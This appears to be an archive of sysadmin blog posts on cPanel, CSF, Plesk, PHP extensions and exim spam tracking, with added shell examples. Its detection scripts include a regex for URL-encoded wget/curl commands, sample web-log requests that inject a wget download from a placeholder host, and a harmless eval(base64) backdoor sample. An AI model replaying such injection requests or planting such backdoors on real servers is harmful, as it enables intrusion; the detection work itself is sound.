Sunday, 8 July 2012

How to disable CSF IP address block alert email

vi /etc/csf/csf.conf

Find the LF_EMAIL_ALERT setting (the default "1" is what sends the alert mails):

# Send an email alert if an IP address is blocked by one of the [*] triggers
LF_EMAIL_ALERT = "1"

Change the value to "0" to stop the per-block alert emails:

LF_EMAIL_ALERT = "0"

Restart csf afterwards so that the change takes effect.
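Added example (not from the original post): the same change done with a small script instead of editing by hand, so it can be repeated on many servers and verified. It assumes the KEY = "value" layout of csf.conf and takes the file path as a parameter; the demo runs on a constructed copy of the relevant lines, not on the real /etc/csf/csf.conf.

```shell
#!/bin/bash
# Added example: set a CSF option in csf.conf idempotently and read it back.
# Assumes the csf.conf layout  KEY = "value"  (one setting per line).

# csf_set_option <conf> <key> <value>: rewrite KEY = "..." in place.
# Fails (without touching the file) if the key is not present at all,
# so a typo in the key name cannot silently do nothing.
csf_set_option() {
    conf=$1; key=$2; value=$3
    grep -q "^${key} = " "$conf" || { echo "key ${key} not found in ${conf}" >&2; return 1; }
    sed -i "s/^${key} = \"[^\"]*\"/${key} = \"${value}\"/" "$conf"
}

# csf_get_option <conf> <key>: print the value of KEY without the quotes.
csf_get_option() {
    sed -n "s/^${2} = \"\([^\"]*\)\".*/\1/p" "$1"
}

# Constructed sample of the relevant part of csf.conf (not a real server file).
demo_conf=$(mktemp)
cat > "$demo_conf" <<'EOF'
# Send an email alert if an IP address is blocked by one of the [*] triggers
LF_EMAIL_ALERT = "1"
# Send an email alert if an IP address is blocked due to a permanent block
LF_PERMBLOCK_ALERT = "1"
EOF

csf_set_option "$demo_conf" LF_EMAIL_ALERT 0
echo "LF_EMAIL_ALERT is now \"$(csf_get_option "$demo_conf" LF_EMAIL_ALERT)\""
```

On a real server run it as csf_set_option /etc/csf/csf.conf LF_EMAIL_ALERT 0 and then csf -r to reload the firewall with the new configuration; other settings on the file, such as LF_PERMBLOCK_ALERT in the sample, are left untouched.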

Thursday, 5 July 2012

How to detect domain being Attacked or Attacking Out in cPanel

What can we do to find out which domain is being attacked, or is attacking out, from or to the server? It does not matter how it happened; we need to stop it and make the server stable again. It is best to do this in real time, while the server is being attacked or is attacking others, so that enough information, evidence and logs can be gathered. It is also recommended to document your troubleshooting process for your own reference. Believe me, you will need it in future.

As for me, I will do basic checking as below:

1. Check the overall server load summary using the top command:

# top -c

2. In the same top session, you can see which process is taking the most resources by sorting by memory (Shift+M) or by CPU usage (Shift+P).

3. Check the network and analyse which connections are flooding your server. The following commands might be useful:

3.1 Count the connections to the server per remote IP address (egrep is needed for the tcp|udp alternation; plain grep would treat it literally):

# netstat -anp | egrep 'tcp|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

3.2 If you have APF installed and are using a kernel older than 2.6.20, you can check the connection tracking table (newer kernels expose it as /proc/net/nf_conntrack instead):

# cat /proc/net/ip_conntrack | cut -d ' ' -f 10 | cut -d '=' -f 2 | sort | uniq -c | sort -nr | head -n 10

3.3 Use tcpdump to analyse the packets transmitted from/to your server. The following command might help to analyse any connection on the eth0 interface to port 53 (DNS); it prints the names being queried:

# tcpdump -vvxXlnni eth0 port 53 | grep 'A?' | awk -F'?' '{print $2}'

4. Analyse the Apache status page at WHM -> Server Status -> Apache Status. To do this via the command line, you can run the following command:

# service httpd fullstatus

5. Analyse the daily process logs at WHM -> Server Status -> Daily Process Logs. Find the top 5 users that consume the most CPU, memory and SQL processes.

After that, we should see some suspected account, process or user which occupies a lot of resources, either CPU, memory or network connections.
Up to this point, we should be able to shortlist the suspected accounts.

Then, for each suspected account, we should take the steps advised below:

6. Scan the public_html directory of the suspected user with an anti-virus. We can use clamav, but make sure the virus definitions are updated before we do this:

6.1 Update the clamav virus definitions:

# freshclam

6.2 Scan the public_html directory of the suspected user recursively, with the scan result logged to scanlog.txt:

# cd /home/user/public_html

# clamscan -i -r -l scanlog.txt &

6.3 Analyse any suspect files found by clamav and quarantine them. Make sure the file can neither be executed nor served: chmod it to 600 and move it out of public_html.

7. Find any PHP files with suspicious characteristics, like eval() of base64-encoded code, and store the list in a text file called scan_base64.txt.
The following command might help (note --include: "grep -r ... *.php" would only recurse into directories whose names end in .php):

# cd /home/user/public_html

# grep -lir "eval(base64" --include='*.php' . > scan_base64.txt

8. Scan the raw Apache access logs for any suspicious activity. The following command might help to find any scripting
activity (URL-encoded shell commands in requests) that happened in all domains via Apache:

# find /usr/local/apache/domlogs -type f -exec egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' {} \;

9. Analysing AWstats and bandwidth usage also gives more clues. Go to cPanel > suspected domain > Logs > Awstats.
In the AWstats page, check the Hosts, Pages-URL or any related section.

There are various ways to carry out this task. For me, the steps above should be enough to detect any domain or account
which is attacking out or being attacked. Different administrators might use different approaches to produce the same result.
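Added example (not from the original post): steps 3.1, 7 and 8 above as shell functions with correct quoting, run against constructed sample data (a fake public_html with one obfuscated PHP file, and a fake domlog with two command-injection attempts) so they can be tried offline. The directory and log paths, the sample IP addresses and the file contents are all made up for the demo; on a real server you would point the functions at /home/user/public_html and the files under /usr/local/apache/domlogs.

```shell
#!/bin/bash
# Added example: the log and file checks from steps 3.1, 7 and 8, as functions.

# top_clients <access_log>: requests per client IP, busiest first
# (the same idea as the netstat one-liner in step 3.1, applied to the log).
top_clients() {
    awk '{print $1}' "$1" | sort | uniq -c | sort -rn
}

# find_encoded_php <dir>: PHP files that eval() a decoded/obfuscated payload.
# --include makes grep recurse correctly; "grep -r pattern *.php" does not.
find_encoded_php() {
    grep -rliE 'eval\((base64_decode|gzinflate|str_rot13)' --include='*.php' "$1"
}

# suspicious_requests <access_log>: requests whose query string carries a
# URL-encoded shell command (wget, curl, perl ... followed by %20, a space).
suspicious_requests() {
    grep -iE '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' "$1"
}

# ---- constructed sample data (not from any real server) -----------------
work=$(mktemp -d)
mkdir -p "$work/public_html/images"
cat > "$work/public_html/index.php" <<'EOF'
<?php echo "hello"; ?>
EOF
# a typical dropped backdoor: the base64 here just decodes to  echo "hi";
cat > "$work/public_html/images/thumb.php" <<'EOF'
<?php eval(base64_decode("ZWNobyAiaGkiOw==")); ?>
EOF
cat > "$work/example.com.log" <<'EOF'
203.0.113.5 - - [05/Jul/2012:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Jul/2012:10:00:02 +0000] "GET /images/thumb.php?cmd=wget%20http://198.51.100.9/x.pl HTTP/1.1" 200 12 "-" "curl/7.19"
198.51.100.7 - - [05/Jul/2012:10:00:03 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Jul/2012:10:00:04 +0000] "GET /images/thumb.php?cmd=perl%20x.pl HTTP/1.1" 200 12 "-" "curl/7.19"
EOF

echo "== requests per client ==";            top_clients "$work/example.com.log"
echo "== obfuscated PHP files ==";           find_encoded_php "$work/public_html"
echo "== command injection attempts ==";     suspicious_requests "$work/example.com.log"
```

In the sample the busiest client, the file it dropped and the requests it used to drive it all line up, which is exactly the correlation between steps 3, 7 and 8 that shortlists an account.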

cPanel not showing FTP user accounts

This issue was due to missing entries in the /etc/proftpd/<username> file (cPanel keeps one proftpd password file per account).

To fix it, just issue the following command:

# /scripts/ftpupdate

This will sync the FTP password files for all the accounts on the server.

Monday, 2 July 2012

Php module installation steps :iconv

Overview :
Installing a single PHP extension without recompiling PHP has never been a difficult job, but most people do not know how, which leads to recompiling the whole of PHP. In this article I will explain how you can add a new PHP extension without recompiling PHP.

In our example, I will show how you can add the iconv PHP extension without recompiling PHP.

root@sysadmin [~]# php -m

To list all the php modules installed in the server

root@sysadmin[~]# php -m|grep iconv

To search for the php module iconv in the module list installed in the server

=============
root@sysadmin [~]# cd /home/cpeasyapache/src/php-5.2.9/ext/
root@sysadmin [/home/cpeasyapache/src/php-5.2.9/ext]# cd iconv/
root@sysadmin [/home/cpeasyapache/src/php-5.2.9/ext/iconv]# phpize
Configuring for:
PHP Api Version:         20041225
Zend Module Api No:      20060613
Zend Extension Api No:   220060519
===============

Phpize-- with an example
------
The phpize command is used to prepare the build environment for a PHP extension. In the following sample, the sources for an extension are in a directory named extname:

$ cd extname
$ phpize
$ ./configure
$ make
# make install
----------------------

You can see the iconv PHP extension is installed under the PHP extensions directory (the 20060613 in the directory name matches the Zend Module Api No printed by phpize, which is how you know the module was built against the running PHP):
ls /usr/local/lib/php/extensions/no-debug-non-zts-20060613/iconv.so

Enable the iconv PHP extension in php.ini (check first that the line is not already there, because this appends a duplicate each time it is run):
echo "extension=iconv.so" >> /usr/local/lib/php.ini

Restart Apache afterwards if PHP runs as an Apache module, then verify iconv:
php -i | grep -i "iconv support"

Output:
iconv support => enabled
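Added example (not from the original post): enabling a freshly built extension in php.ini in a way that can be re-run safely. It refuses if the .so is not in the extension directory, and it does not append a second extension= line if one is already there, which the plain echo >> above does. The php.ini path and extension directory are parameters; the demo uses a constructed php.ini and an empty stand-in iconv.so, not the server's real files.

```shell
#!/bin/bash
# Added example: idempotent "extension=name.so" enabling for php.ini.

# enable_php_extension <php.ini> <extension_dir> <name>
enable_php_extension() {
    ini=$1; extdir=$2; ext=$3
    if [ ! -f "$extdir/$ext.so" ]; then
        echo "$extdir/$ext.so not found: run phpize / configure / make install first" >&2
        return 1
    fi
    # already listed (with or without quotes, any spacing): nothing to do
    if grep -qE "^[[:space:]]*extension[[:space:]]*=[[:space:]]*\"?${ext}\.so\"?" "$ini"; then
        return 0
    fi
    echo "extension=${ext}.so" >> "$ini"
}

# count_extension_lines <php.ini> <name>: how many times the extension is listed
count_extension_lines() {
    grep -cE "^[[:space:]]*extension[[:space:]]*=[[:space:]]*\"?${2}\.so\"?" "$1" || true
}

# ---- constructed demo files (not the server's php.ini or extension dir) ---
work=$(mktemp -d)
mkdir "$work/ext"
: > "$work/ext/iconv.so"                       # stand-in for the compiled module
printf 'extension_dir = "%s"\n' "$work/ext" > "$work/php.ini"

enable_php_extension "$work/php.ini" "$work/ext" iconv
enable_php_extension "$work/php.ini" "$work/ext" iconv    # second run is a no-op
echo "iconv listed $(count_extension_lines "$work/php.ini" iconv) time(s) in $work/php.ini"
```

On a real cPanel build the call would be enable_php_extension /usr/local/lib/php.ini /usr/local/lib/php/extensions/no-debug-non-zts-20060613 iconv, followed by the Apache restart and the php -i check from the post.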

Saturday, 16 June 2012

How to update stats in Plesk ?

Sometimes the web stats for a domain, or for all domains on the server, do not update automatically. In that case you can update the stats on the server easily by running the commands below:

To update the web stats for a particular domain:

root@server[#] /usr/local/psa/admin/sbin/statistics --calculate-one --domain-name=domainname

Note : Replace domain.com with the actual d

Thursday, 31 May 2012

Shared IP Vs. Dedicated IP

Difference Between Shared IP and dedicated IP


Every computer connected to the Internet is assigned a unique IP address for the purpose of communication. An IPv4 address is a 32-bit numeric address, usually written as 4 numbers from 0-255 separated by dots, for example 192.168.0.123. Billions of addresses are possible, but the number is finite.

How to Monitor Linux Server

Here you will get good tricks and tips on how to monitor a Linux server, how to manage it if it is under load, how to find a spammer, and how to check HTTP and MySQL processes.


General Commands,
To check the server load and which users are logged on, with their IP addresses, you can run this command:

w

To check the server load and watch the processes (-d sets the refresh delay in seconds, -c shows full command lines):

top
top -d 2
top -c -d 2

Memory status:

free -m

To see all processes running on the server, as a process tree:

ps auxf

With the above commands you can see which process is causing load on the server; after that you can go on with the next steps.

If you see many exim processes, you can check exim in more detail. The following shows the total number of messages in the exim queue:

exim -bpc

Print a listing of the messages in the queue

exim -bp

The following commands show the path of the script being used to send mail:

ps -C exim -fH eww
ps -C exim -fH eww | grep home
cd /var/spool/exim/input/
egrep "X-PHP-Script" * -R

Shows the number of frozen emails:

exim -bpr | grep frozen | wc -l

To remove FROZEN mails from the queue (-z selects frozen messages, -i prints only their IDs):

exiqgrep -z -i | xargs exim -Mrm

Do not drop the -z: without it, exiqgrep -i lists every message in the queue and the xargs would remove all of them.

Check for spamming if anybody is using a PHP script in a home directory to send mail:

tail -f /var/log/exim_mainlog | grep home

If anyone is spamming from /tmp:

tail -f /var/log/exim_mainlog | grep /tmp

To display the IPs with the most attempts to send mail that were rejected by the server (top 5 in the last 3000 log lines):

tail -3000 /var/log/exim_mainlog | grep 'rejected RCPT' | awk '{print $4}' | awk -F'[' '{print $2}' | awk -F']' '{print $1}' | sort | uniq -c | sort -k 1 -nr | head -n 5

Shows the number of connections to the SMTP server per IP:

netstat -plan | grep :25 | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nk 1

Shows, per domain, the number of messages in the queue:

exim -bp | exiqsumm | more

If the spam is coming from an outside domain, you can block that domain or email address on the server with a system filter:

pico /etc/antivirus.exim

Add the following lines:

if $header_from: contains "name@domain.com"
then
  seen finish
endif

Catching a spammer
Check the mail stats:

exim -bp | exiqsumm | more

The following command shows the sender addresses with the most messages currently in the queue, with exact counts (the grep -v drops bounces, whose sender is the empty address <>):

exim -bpr | grep "<" | awk '{print $4}' | grep -v "<>" | sort | uniq -c | sort -n

This one shows the same count per sender domain:

exim -bpr | grep "<" | awk '{print $4}' | grep -v "<>" | awk -F "@" '{print $2}' | sort | uniq -c | sort -n

Check if any PHP script is causing the mass mailing with:

cd /var/spool/exim/input

egrep "X-PHP-Script" * -R

Just cat the message ID (the -H header file) that you get and you will be able to see which script is causing the problem.
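Added example (not from the original post): the two mail checks above, counting rejected RCPT commands per client IP and finding the scripts named in X-PHP-Script headers of queued messages, as functions that take the log file and spool directory as parameters. They run here on constructed exim_mainlog lines and constructed spool header files (the numeric prefix on those lines mimics the exim -H spool layout and is only illustrative); on a real server pass /var/log/exim_mainlog and /var/spool/exim/input.

```shell
#!/bin/bash
# Added example: rejected-RCPT top talkers and X-PHP-Script senders.

# rejected_rcpt_top <exim_mainlog> [n]: client IPs with the most rejected
# RCPT commands. The IP is taken from inside [...] rather than by field
# number, so it still works if the log line carries a pid column.
rejected_rcpt_top() {
    grep 'rejected RCPT' "$1" \
        | sed -n 's/.*\[\([0-9.]*\)\].*rejected RCPT.*/\1/p' \
        | sort | uniq -c | sort -rn | head -n "${2:-5}"
}

# php_scripts_in_queue <spool_input_dir>: scripts named in the X-PHP-Script
# header of queued messages, with a count per script (most common first).
# The header value looks like "host/path/script.php for <client-ip>".
php_scripts_in_queue() {
    grep -rh 'X-PHP-Script:' "$1" \
        | sed 's/.*X-PHP-Script: *//; s/ for .*//' \
        | sort | uniq -c | sort -rn
}

# ---- constructed sample data (addresses, hosts and IDs are made up) ------
work=$(mktemp -d)
cat > "$work/exim_mainlog" <<'EOF'
2012-07-05 10:01:22 H=(bad.example) [203.0.113.9] F=<spam@example.org> rejected RCPT <x@example.com>: relay not permitted
2012-07-05 10:01:23 H=(bad.example) [203.0.113.9] F=<spam@example.org> rejected RCPT <y@example.com>: relay not permitted
2012-07-05 10:01:25 H=mail.example.net [198.51.100.4] F=<a@example.net> rejected RCPT <nouser@example.com>: Unrouteable address
2012-07-05 10:01:30 1SmkZ1-0001aB-Cd <= www-data@example.com U=www-data P=local S=412 id=1@example.com
2012-07-05 10:01:31 H=(bad.example) [203.0.113.9] F=<spam@example.org> rejected RCPT <z@example.com>: relay not permitted
EOF
mkdir "$work/input"
printf '%s\n' '040  X-PHP-Script: example.com/blog/wp-mail.php for 203.0.113.9' > "$work/input/1SmkZ1-0001aB-Cd-H"
printf '%s\n' '040  X-PHP-Script: example.com/blog/wp-mail.php for 203.0.113.9' > "$work/input/1SmkZ2-0001aC-De-H"
printf '%s\n' '030  X-PHP-Script: example.com/contact.php for 198.51.100.4'     > "$work/input/1SmkZ3-0001aD-Ef-H"

echo "== rejected RCPT per client IP ==";  rejected_rcpt_top "$work/exim_mainlog"
echo "== scripts behind queued mail ==";   php_scripts_in_queue "$work/input"
```

The script that tops the second list is the one to read (and usually to chmod 000 or move out of the web root) before clearing its messages from the queue.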

To remove every queued message sent from a particular domain or sender address (here ragnarockradio.org; $3 is the message ID on the sender line of exim -bpr output):

exim -bpr | grep "ragnarockradio.org" | awk '{print $3}' | xargs exim -Mrm

If MySQL is causing the load, you can use the following commands to check it.

mysqladmin pr

mysqladmin -u root processlist

mysqladmin version

watch mysqladmin proc

If Apache is causing the load, check it using the following commands.

netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

netstat -an | grep :80 | wc -l

netstat -n | grep :80 | wc -l; uptime; netstat -n | wc -l

netstat -tupl

pidof httpd

lsof -p pid


Other Useful Commands

To check the PID of php and the files it has open:

pidof php

lsof -p pid

netstat -na | grep :80 | sort

Use the command below to get the top memory consuming processes (%MEM is the 4th column of ps aux):

ps aux | head -1; ps aux --no-headers | sort -rn -k4 | head

Use the command below to get the top CPU consuming processes (%CPU is the 3rd column):

ps aux | head -1; ps aux --no-headers | sort -rn -k3 | more

You can check if any backup is going on, run the following commands


ps aux | grep pkg

ps aux | grep gzip

ps aux | grep backup

We can trace the user responsible for high web server resource usage with the following commands, which look for large media or archive downloads in the access log:

grep mp3 /etc/httpd/logs/access_log

grep rar /etc/httpd/logs/access_log

grep wav /etc/httpd/logs/access_log

and so on. A large number of 408 (Request Timeout) responses means clients are opening connections but never completing a request, which is typical of slowloris-style connection flooding, so the following can be used to check for such DDoS attacks on the server (the pattern also matches a 408 elsewhere in the line, such as a byte count, so look at the status column of the hits):

grep 408 /etc/httpd/logs/access_log